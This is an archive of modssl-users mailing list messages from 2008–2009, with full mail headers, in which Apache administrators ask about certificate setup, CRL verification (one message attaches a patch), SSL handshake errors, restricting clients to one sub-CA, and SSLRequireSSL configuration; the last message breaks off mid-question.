Message-ID: <7E05BCB4A78DB84B9DCEB35CF963DFCF0145D10CB6@SDGEXEVS09.corp.intuit.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Using multiple certs with mod_ssl behind load balancer
Thread-Index: AclP+73jWzTBZDthTI6/fFTgl/8bzA==
From: "Holt, Joe" 
To: 
X-OriginalArrivalTime: 26 Nov 2008 19:18:20.0091 (UTC) FILETIME=[BE1088B0:01C94FFB]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Holt, Joe" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

=20

 I've been asked to implement a somewhat strange setup. We are going to =
handle ssl decryption on the load balancer then forward the connections =
to either an IIS or Apache server. I'm tasked with configuring the =
Apache servers. I need to be able to use multiple certs but I'm not sure =
how. I've made test runs using SSLCertificateChainFile and =
SSLCACertificatePath but I couldn't get either to work.
What are the correct steps I need to follow?


Joe Holt | Product Development, Intuit Small Business Web | 650-549-3454

=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb  3 19:13:21 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3B0DC14DA2B; Tue,  3 Feb 2009 19:13:21 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ey-out-2122.google.com (ey-out-2122.google.com [74.125.78.27])
	by master.modssl.org (Postfix) with ESMTP id 0A13A14D839
	for ; Tue,  3 Feb 2009 19:13:20 +0100 (CET)
Received: by ey-out-2122.google.com with SMTP id 4so290160eyf.1
        for ; Tue, 03 Feb 2009 10:12:00 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:received:in-reply-to:references
         :date:message-id:subject:from:to:content-type;
        bh=NoOmM9++MsunLKTcDh1aT60+LO3+xoMHa8WBqmQhSGI=;
        b=vCkCeVhJ29Tj+QZpTUmuw+wbXN6MNHLpWB/587FBIgzAVaJTnQc1QsIVlyeEc0H3Kx
         t2sbA6MZjwtWAz7X202Sxvo/S/5BPkIy3LOSJK/3hRIY0nAHidSPZZ8sYueGGghknp6f
         Wm3VgxnOxs6HXoMMB/iemlI+MhoklKe6KWpUI=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:in-reply-to:references:date:message-id:subject:from:to
         :content-type;
        b=Imtlbqv2Ujo8ZkNS8tYmIWjLn06NsJfzsuf7qn+CaI8mVes6NxxchTVyVw+NNpSVfb
         7JDUMcX3wEpsVOy9JwZatul/xkClGxfTC8EkLBRyBckal9Up7ZrzaMLK+vzmPuGguFYG
         r55JqbdxDGaYuq5GBV1RmjjiQZWjyFM/0SfQM=
MIME-Version: 1.0
Received: by 10.103.121.19 with SMTP id y19mr2567949mum.56.1233684720477; Tue, 
	03 Feb 2009 10:12:00 -0800 (PST)
In-Reply-To: 
References: 
Date: Tue, 3 Feb 2009 19:12:00 +0100
Message-ID: 
Subject: Strange CRL verification behaviour
From: Christophe Nanteuil 
To: modssl-users@modssl.org
Content-Type: multipart/mixed; boundary=001636b430fb8768170462079b06
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christophe Nanteuil 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--001636b430fb8768170462079b06
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit

Hello,
I am a stunnel user, which implements code from mod_ssl for
certificate/CRL verifications.
I noticed a strange behaviour when verifying a CRL which uses the
ssl_callback_SSLVerify_CRL function of mod_ssl :

If the CRLfile is not a valid CRL, stunnel starts and ignores the CRLfile.
Then, for any new connection, logs show "CRL: verification passed",
which means that ssl_callback_SSLVerify_CRL returned TRUE.
-> NOT OK, IMO.

examples of wrong CRLs : a CRL issued by an unknown CA or a
certificate in the PEM format.

I propose the attached patch to modify behaviour of the
ssl_callback_SSLVerify_CRL function, ie return false if no CRL
corresponding to the issuer of each certificate of the chain is found.

-- 
Christophe Nanteuil

--001636b430fb8768170462079b06
Content-Type: text/x-patch; charset=US-ASCII; name="ssl_mod-crl.patch"
Content-Disposition: attachment; filename="ssl_mod-crl.patch"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fqqvy4na1

LS0tIHNzbF9lbmdpbmVfa2VybmVsLmMuc2F2ZWQJMjAwOS0wMi0wMyAxODo0Nzo1MS4wMDAwMDAw
MDAgKzAxMDAKKysrIHNzbF9lbmdpbmVfa2VybmVsLmMJMjAwOS0wMi0wMyAxODo1NToxMi4wMDAw
MDAwMDAgKzAxMDAKQEAgLTE2MTUsNiArMTYxNSw3IEBACiAgICAgY2hhciAqY3A7CiAgICAgY2hh
ciAqY3AyOwogICAgIEFTTjFfVElNRSAqdDsKKyAgICBCT09MIGdvb2RfY3JsID0gRkFMU0U7CiAK
ICAgICAvKgogICAgICAqIFVubGVzcyBhIHJldm9jYXRpb24gc3RvcmUgZm9yIENSTHMgd2FzIGNy
ZWF0ZWQgd2UKQEAgLTE3MjQsNiArMTcyNSw3IEBACiAgICAgICAgICAgICByZXR1cm4gRkFMU0U7
CiAgICAgICAgIH0KICAgICAgICAgWDUwOV9PQkpFQ1RfZnJlZV9jb250ZW50cygmb2JqKTsKKyAg
ICAgICAgZ29vZF9jcmwgPSBUUlVFOwogICAgIH0KIAogICAgIC8qCkBAIC0xNzY0LDggKzE3NjYs
OSBAQAogICAgICAgICAgICAgfQogICAgICAgICB9CiAgICAgICAgIFg1MDlfT0JKRUNUX2ZyZWVf
Y29udGVudHMoJm9iaik7CisgICAgICAgIGdvb2RfY3JsID0gVFJVRTsKICAgICB9Ci0gICAgcmV0
dXJuIG9rOworICAgIHJldHVybiAoZ29vZF9jcmw/b2s6RkFMU0UpOwogfQogCiAvKgo=
--001636b430fb8768170462079b06--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  4 05:43:47 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6330814D9ED; Wed,  4 Mar 2009 05:43:47 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from qw-out-2122.google.com (qw-out-2122.google.com [74.125.92.24])
	by master.modssl.org (Postfix) with ESMTP id CADF014D839
	for ; Wed,  4 Mar 2009 05:43:46 +0100 (CET)
Received: by qw-out-2122.google.com with SMTP id 5so2616149qwd.1
        for ; Tue, 03 Mar 2009 20:42:25 -0800 (PST)
Received: by 10.224.61.20 with SMTP id r20mr11002435qah.118.1236141745133;
        Tue, 03 Mar 2009 20:42:25 -0800 (PST)
Received: from ?192.168.15.5? (cpe-24-90-126-230.nyc.res.rr.com [24.90.126.230])
        by mx.google.com with ESMTPS id 6sm2195243yxg.56.2009.03.03.20.42.24
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Tue, 03 Mar 2009 20:42:24 -0800 (PST)
Message-Id: 
From: Andres Morey 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0 (Apple Message framework v929.2)
Subject: mod_ssl errors
Date: Tue, 3 Mar 2009 23:42:14 -0500
X-Mailer: Apple Mail (2.929.2)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andres Morey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

I switched my LogLevel to info and noticed this error in the logs:

[client ::1] (70007)The timeout specified has expired: SSL input  
filter read failed.

Furthermore, when I do a graceful restart, I get this error:

[client ::1] SSL library error 1 in handshake (server localhost:443)
SSL Library Error: 336027900 error:140760FC:SSL  
routines:SSL23_GET_CLIENT_HELLO:unknown protocol speaking not SSL to  
HTTPS port!?
[client ::1] Connection closed to child 9 with abortive shutdown  
(server localhost:443)

I am using mod_ssl/2.2.11 compiled against Server: Apache/2.2.11,  
Library: OpenSSL/0.9.8h on OS X but I have also seen the problem on  
Linux as well. The setup I have is dead simple - I am setting up a  
virtual host on port 80 and on port 443, both serving static files  
from apache/htdocs. Does anybody have any ideas what could be causing  
these ssl errors?

Thanks,
Andres
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 12 15:04:53 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B645D14D885; Thu, 12 Mar 2009 15:04:53 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 2791314D837
	for ; Thu, 12 Mar 2009 15:04:29 +0100 (CET)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1LhlV5-0002VB-7k
	for modssl-users@modssl.org; Thu, 12 Mar 2009 07:03:07 -0700
Message-ID: <22469681.post@talk.nabble.com>
Date: Thu, 12 Mar 2009 07:03:07 -0700 (PDT)
From: leanmeandonothingmachine 
To: modssl-users@modssl.org
Subject: Client Verification with sub ca's
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: leanmeandonothingmachine@gmail.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: leanmeandonothingmachine 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I have a self signed ca, with multiple sub-ca's.

root
 -sub-ca1
 -sub-ca2
 -server

I sign client certificates with either -sub-ca1 or -sub-ca2, and use server
to sign certificates for the actual website. So in my apache config, i have
this:

        SSLEngine on
        SSLOptions +stdEnvVars
        SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

        SSLCertificateFile /data/keys/test.crt
        SSLCertificateKeyFile /data/keys/test.key
        SSLCertificateChainFile /data/keys/chain.pem

        SSLVerifyClient require
        SSLVerifyDepth 2
        SSLCACertificateFile /data/keys/ca.pem

test.crt is signed by server.
chain.pem contains server and root in that order
ca.pem contains sub-ca2 and root in that order

Everything seems to work fine except for the fact that the website also
excepts client certificates signed by sub-ca1. But I'm trying to restrict
this site to only sub-ca2 clients.

I tried:

1) removing the root from ca.pem, that gives me a "Certificate Verification:
Error (2): unable to get issuer certificate" error.

2) removing the root from ca.pem adding sub-ca2 to chain.pem, same error.

3) changing SSLVerifyDepth to 1, that give me a "Certificate Verification:
Certificate Chain too long (chain has 2 certificates, but maximum allowed
are only 1)" error.

Anyone know how to get apache to only allow clients from one sub-ca but not
others signed by the same root?
-- 
View this message in context: http://www.nabble.com/Client-Verification-with-sub-ca%27s-tp22469681p22469681.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 12 15:23:23 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C7F1514D9EA; Thu, 12 Mar 2009 15:23:23 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from web58308.mail.re3.yahoo.com (web58308.mail.re3.yahoo.com [68.142.236.161])
	by master.modssl.org (Postfix) with SMTP id 5453E14D837
	for ; Thu, 12 Mar 2009 15:22:58 +0100 (CET)
Received: (qmail 91975 invoked by uid 60001); 12 Mar 2009 14:21:37 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1236867696; bh=iOamSqcDv+GVyFuf+swek7NyRIs7WZyYXBGj7FSN1yo=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:MIME-Version:Content-Type; b=UG78onCPwL6MyezJE2PWPTNWOPgdh7UTaqkKr9bvJjxKy65T3X6zwRhpTgujWso5R7AcaNDXszS+2F8ZiitmBA9jCJw9QjYwIW+GjKZZF0RlsrLPQqs0QXekH6J9F6T3mHiqfj4pyQ7FWJS6mZJVyiEgQDpdGyk4JJPekvMZaX4=
DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:MIME-Version:Content-Type;
  b=TnXWkWsYxXVB2XBuuFwGuOLDbJ750R80SH4EXEUCC/xan0iczYM1J4apQyHDIlNknD2jJWlhdTRRoTfMjZdR+o5TIJjKOTxTj+ZOzFN0lRDRl9XMpQu8A5a6lwKu2t4537VJTRkQnZ/alCtQKmou3+GXQcJ3rD7+sG4dpcO5R+g=;
Message-ID: <974284.91957.qm@web58308.mail.re3.yahoo.com>
X-YMail-OSG: hP6wUfcVM1kP4jXuKAwiXOrGlssee4vPDX6VnrdTP3JNG33XyLaoKHV0H3mbHF8VMnjgZ8M5rewQ_fiuJl6yMqLCOd1Qe4z3YTyDH2eiLwDi6C12n_XbqrCSGv0AyHYQcJE7DJ6JYBi_yZSdt02MpDMyKWutTdpy2Zn3MVQqHL_HSrSod119.AUwKdJMSg--
Received: from [90.212.33.38] by web58308.mail.re3.yahoo.com via HTTP; Thu, 12 Mar 2009 07:21:36 PDT
X-Mailer: YahooMailRC/1155.45 YahooMailWebService/0.7.289.1
References: <22469681.post@talk.nabble.com>
Date: Thu, 12 Mar 2009 07:21:36 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Client Verification with sub ca's
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi,

Same setup as works with both subCAs. Use the SSLRequire directive. Restrict on the client certs issuer field (SSL_CLIENT_I_DN...).

Regards
Matt





----- Original Message ----
From: leanmeandonothingmachine 
To: modssl-users@modssl.org
Sent: Thursday, March 12, 2009 2:03:07 PM
Subject: Client Verification with sub ca's


I have a self signed ca, with multiple sub-ca's.

root
-sub-ca1
-sub-ca2
-server

I sign client certificates with either -sub-ca1 or -sub-ca2, and use server
to sign certificates for the actual website. So in my apache config, i have
this:

        SSLEngine on
        SSLOptions +stdEnvVars
        SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

        SSLCertificateFile /data/keys/test.crt
        SSLCertificateKeyFile /data/keys/test.key
        SSLCertificateChainFile /data/keys/chain.pem

        SSLVerifyClient require
        SSLVerifyDepth 2
        SSLCACertificateFile /data/keys/ca.pem

test.crt is signed by server.
chain.pem contains server and root in that order
ca.pem contains sub-ca2 and root in that order

Everything seems to work fine except for the fact that the website also
excepts client certificates signed by sub-ca1. But I'm trying to restrict
this site to only sub-ca2 clients.

I tried:

1) removing the root from ca.pem, that gives me a "Certificate Verification:
Error (2): unable to get issuer certificate" error.

2) removing the root from ca.pem adding sub-ca2 to chain.pem, same error.

3) changing SSLVerifyDepth to 1, that give me a "Certificate Verification:
Certificate Chain too long (chain has 2 certificates, but maximum allowed
are only 1)" error.

Anyone know how to get apache to only allow clients from one sub-ca but not
others signed by the same root?
-- 
View this message in context: http://www.nabble.com/Client-Verification-with-sub-ca%27s-tp22469681p22469681.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                  www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



      
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 12 16:26:47 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EF00914D9EA; Thu, 12 Mar 2009 16:26:47 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id F17CA14D837
	for ; Thu, 12 Mar 2009 16:26:22 +0100 (CET)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1LhmmK-0006Wo-5j
	for modssl-users@modssl.org; Thu, 12 Mar 2009 08:25:00 -0700
Message-ID: <22478223.post@talk.nabble.com>
Date: Thu, 12 Mar 2009 08:25:00 -0700 (PDT)
From: leanmeandonothingmachine 
To: modssl-users@modssl.org
Subject: Re: Client Verification with sub ca's
In-Reply-To: <974284.91957.qm@web58308.mail.re3.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: leanmeandonothingmachine@gmail.com
References: <22469681.post@talk.nabble.com> <974284.91957.qm@web58308.mail.re3.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: leanmeandonothingmachine 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


thanks that works, a little tricky if you want to use SSLVerifyClient
optional, as it 403s everything in that case instead just not filling in the
client variables. But I can always do that programmaticaly if I need it.
-- 
View this message in context: http://www.nabble.com/Client-Verification-with-sub-ca%27s-tp22469681p22478223.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 12 16:27:45 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4605714DA5B; Thu, 12 Mar 2009 16:27:45 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158])
	by master.modssl.org (Postfix) with ESMTP id 9987514DA28
	for ; Thu, 12 Mar 2009 16:27:20 +0100 (CET)
Received: from isper.nabble.com ([192.168.236.156])
	by kuber.nabble.com with esmtp (Exim 4.63)
	(envelope-from )
	id 1LhmnG-0006Yz-HU
	for modssl-users@modssl.org; Thu, 12 Mar 2009 08:25:58 -0700
Message-ID: <22478226.post@talk.nabble.com>
Date: Thu, 12 Mar 2009 08:25:58 -0700 (PDT)
From: leanmeandonothingmachine 
To: modssl-users@modssl.org
Subject: Re: Client Verification with sub ca's
In-Reply-To: <974284.91957.qm@web58308.mail.re3.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: leanmeandonothingmachine@gmail.com
References: <22469681.post@talk.nabble.com> <974284.91957.qm@web58308.mail.re3.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: leanmeandonothingmachine 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


thanks that works, a little tricky if you want to use SSLVerifyClient
optional, as it 403s everything in that case instead of just not filling in
the client variables. But I can always do that programmaticaly if I need it.
-- 
View this message in context: http://www.nabble.com/Client-Verification-with-sub-ca%27s-tp22469681p22478226.html
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 14 17:24:04 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BFE3F14DA3D; Sat, 14 Mar 2009 17:24:04 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from yx-out-2324.google.com (yx-out-2324.google.com [74.125.44.29])
	by master.modssl.org (Postfix) with ESMTP id 549AF14D860
	for ; Sat, 14 Mar 2009 17:23:40 +0100 (CET)
Received: by yx-out-2324.google.com with SMTP id 8so410994yxm.61
        for ; Sat, 14 Mar 2009 09:22:18 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:sender:received:date
         :x-google-sender-auth:message-id:subject:from:to:content-type;
        bh=JwMqoAG779O7RD6VzVi8YcPtf89HtfndbIwfrW5rq24=;
        b=URGyMqlpJcTrmhgoFbwGFoPH2AZQkW1QDqQBTJ5EGE8bjN0WWomyFVvkILC8G7liu0
         uzPzFt4VkxwN6G6UOfDQi5Fy+Y19VIMoxV8RRzSoEttNncv2BKQCNJ2HF2/Lza666nlq
         vXbYHn210YQ8XDypRbcMSVZpUF9g/lEWXj49k=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:sender:date:x-google-sender-auth:message-id:subject
         :from:to:content-type;
        b=cnOHzizX8Mwm38+KWHam3oNbyPYXj3ttZk0cyarib3LA80ByhWBk3gWvs2pdk2+0Dc
         WQTDV/H639+trqzzYiEHLjSqJ+UeFn121twJahfMaB9dCK4YIZzcYl8abq8CfGgKcHXU
         qc7BC51c1TDOL014VTxL12LIIEF8MfdDFOcr4=
MIME-Version: 1.0
Received: by 10.231.20.2 with SMTP id d2mr572898ibb.27.1237047737755; Sat, 14 
	Mar 2009 09:22:17 -0700 (PDT)
Date: Sat, 14 Mar 2009 09:22:17 -0700
X-Google-Sender-Auth: a02bd154dc671f93
Message-ID: <2d739b560903140922t41587131wd2169e35e54ab175@mail.gmail.com>
Subject: SSLRequireSSL Ineffective
From: Lee Hughes 
To: modssl-users@modssl.org
Content-Type: multipart/alternative; boundary=00032557467afaa7590465169e7a
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lee Hughes 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--00032557467afaa7590465169e7a
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Hi, I have https working with Apache 2.2.11, but SSLRequireSSL seems to have
no effect -- I can still browse docs in the htdocs directory with straight
http or https.

Here's the section I added to httpd-ssl.conf, which is Included from
httpd.conf. No .htaccess files exist.


SSLRequireSSL
SSLOptions +StrictRequire


Thanks much for any help.
-- 
Lee

--00032557467afaa7590465169e7a
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

Hi, I have https working with Apache 2.2.11, but SSLRequireSSL seems to hav=
e no effect -- I can still browse docs in the htdocs directory with straigh=
t http or https.

Here's the section I added to httpd-ssl.conf, w=
hich is Included from httpd.conf. No .htaccess files exist.


<Directory "/usr/local/apache2/htdocs">
SSLRequireSS=
L
SSLOptions +StrictRequire
</Directory>

Thanks much for=
 any help.
-- 
Lee



--00032557467afaa7590465169e7a--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Mar 14 17:30:18 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8D31614DA47; Sat, 14 Mar 2009 17:30:18 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail-gx0-f177.google.com (mail-gx0-f177.google.com [209.85.217.177])
	by master.modssl.org (Postfix) with ESMTP id 2C70714DA39
	for ; Sat, 14 Mar 2009 17:29:53 +0100 (CET)
Received: by gxk25 with SMTP id 25so3843268gxk.1
        for ; Sat, 14 Mar 2009 09:28:31 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:mime-version:sender:received:in-reply-to
         :references:date:x-google-sender-auth:message-id:subject:from:to
         :content-type;
        bh=KLkvdREkWPZK8Y8Zdm2Z6u43RWeLZM+lPgLwT1h5jG0=;
        b=qXMS7k9tY/upU7Gq6RA+mpPGXgyyhpSuS7zHCBDEI3KEebZ0YTUDaGwQzdsYy2QEs8
         y9rgxGaHpmzi7W2MQVg19fZBGNzt/10UMFNwkAvQyzaGGCuf8wuLuhEZEhIL4OBnN4Ph
         /aw6NS2/5dCRXMcNfrRKjXQUxfvuqWNxVzbzA=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=mime-version:sender:in-reply-to:references:date
         :x-google-sender-auth:message-id:subject:from:to:content-type;
        b=xPlgCUWobnebAP4Oo80X19lwANHA+0p4k1kfE0aRjikptS0n3jcaJUQXN14ktblpPa
         AM1AhCJ2/AIrSkiYWnFJ/rsWtXaHOaHQWxZ5j8b2iek5NBRsiuyNm28qpu4eZvdM8RvO
         uNNZClTb47hdw4dg4/3N1RtOGQ0CljwKZ6AFw=
MIME-Version: 1.0
Received: by 10.231.20.65 with SMTP id e1mr540881ibb.1.1237048111572; Sat, 14 
	Mar 2009 09:28:31 -0700 (PDT)
In-Reply-To: <2d739b560903140922t41587131wd2169e35e54ab175@mail.gmail.com>
References: <2d739b560903140922t41587131wd2169e35e54ab175@mail.gmail.com>
Date: Sat, 14 Mar 2009 09:28:31 -0700
X-Google-Sender-Auth: d9cada799df617ef
Message-ID: <2d739b560903140928u53f4fbeam388a7cfb44262f7a@mail.gmail.com>
Subject: Re: SSLRequireSSL Ineffective
From: Lee Hughes 
To: modssl-users@modssl.org
Content-Type: multipart/alternative; boundary=00032557474642a6a7046516b566
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lee Hughes 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--00032557474642a6a7046516b566
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Some more info -- if I add this same Directory section to httpd.conf it
works fine and forces https access. It's like the line

Include conf/extra/httpd-ssl.conf

in httpd.conf has no effect -- why would that be?

Thanks-

Lee

--00032557474642a6a7046516b566
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Some more info -- if I add this same Directory section to httpd.conf it works fine and forces https access. It's like the line

Include conf/extra/httpd-ssl.conf 

in httpd.conf has no effect -- why would that be?


Thanks-

Lee



--00032557474642a6a7046516b566--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 23 23:26:12 2009
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3F39B14DA60; Thu, 23 Apr 2009 23:26:12 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from otl_general.otc.utexas.edu (mail-smtp.otc.utexas.edu [129.116.186.36])
	by master.modssl.org (Postfix) with ESMTP id CA0C814D86D
	for ; Thu, 23 Apr 2009 23:26:11 +0200 (CEST)
Received: from OTC-EXCH-01.otc.utexas.edu ([192.168.80.201] RDNS failed) by otl_general.otc.utexas.edu with Microsoft SMTPSVC(6.0.3790.3959);
	 Thu, 23 Apr 2009 16:24:45 -0500
Received: from 192.168.80.106 ([192.168.80.106]) by OTC-EXCH-01.otc.utexas.edu ([192.168.80.205]) with Microsoft Exchange Server HTTP-DAV ;
 Thu, 23 Apr 2009 21:24:45 +0000
User-Agent: Microsoft-Entourage/12.15.0.081119
Date: Thu, 23 Apr 2009 16:24:45 -0500
Subject: Client SSL Proxy Configuration
From: John Jimenez 
To: 
Message-ID: 
Thread-Topic: Client SSL Proxy Configuration
Thread-Index: AcnESNXG1GV0Oogu0km1WS6ben+DPQAERZi5
In-Reply-To: 
Mime-version: 1.0
Content-type: multipart/alternative;
	boundary="B_3323348685_2903263"
X-OriginalArrivalTime: 23 Apr 2009 21:24:45.0560 (UTC) FILETIME=[EC7E3F80:01C9C459]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Jimenez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--B_3323348685_2903263
Content-type: text/plain;
	charset="ISO-8859-1"
Content-transfer-encoding: quoted-printable

Hello,
>=20
> I consume web services from an outside-of-my-firewall SSL server that req=
uires
> clients to be SSL-authenticated (clients must pre-register).  My applicat=
ion
> server resides inside of my firewall.  I would like to access the
> aforementioned web services through a proxy in order to not expose my int=
ernal
> server hostname to the outside world.  I have tried to setup my SSL conne=
ction
> (e.g., using my client certificate, trusting the web service provider) fr=
om
> within my internal application server w/ the client certificate generated=
 for
